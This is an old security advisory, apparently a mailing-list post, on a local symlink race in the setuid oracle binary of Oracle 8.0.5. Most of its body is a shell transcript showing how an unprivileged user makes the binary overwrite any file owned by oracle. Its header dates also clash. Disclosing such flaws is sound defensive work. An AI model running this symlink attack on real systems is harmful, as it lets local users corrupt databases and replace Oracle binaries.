WWW.PLAZASITE.COM

                  System & Security Division

   Title: Vulnerability in oracle binary in Oracle 8.0.5

    Date: 11-12-2000

Platform: Only tested in Linux, but can be "exported" to others.

  Impact: Any user compromise any file owned by oracle (DDBB owner).

  Author: Juan Manuel Pascual (paskplazasite.com)

  Status: Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:
    There is a write permision checking error in oracle binary that can
be used by local
users to write any file owned by oracle.

IMPACT:
    Any user with local access, can corrupt the database. Overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted .

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba paskplazasite.com

Only for educational purposes. (corrupt a ddbb isnt an educational purpose!)

[paskproves1 /tmp]$
[paskproves1 /tmp]$ mkdir rdbms
[paskproves1 /tmp]$ cd rdbms/
[paskproves1 rdbms]$ mkdir log
[paskproves1 rdbms]$ cd log
[paskproves1 log]$
[paskproves1 log]$ ls -alc
total 8
drwxrwxr-x 2 pask pask 4096 dic 14 02:33 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
[paskproves1 log]$ export ORACLE_HOME=/tmp
[paskproves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[paskproves1 log]$ ls -alc
total 12
drwxrwxr-x 2 pask pask 4096 dic 14 02:35 .
drwxrwxr-x 3 pask pask 4096 dic 14 02:33 ..
-rw-r----- 1 oracle pask 47 dic 14 02:35 ora_24028.trc

Upsssssssss a log owned by oracle with the structure ora_pid.trc
I can create:
[paskproves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
paskproves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log will be my link .. and i overwrite the binary. what about dbf files and go on ....

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]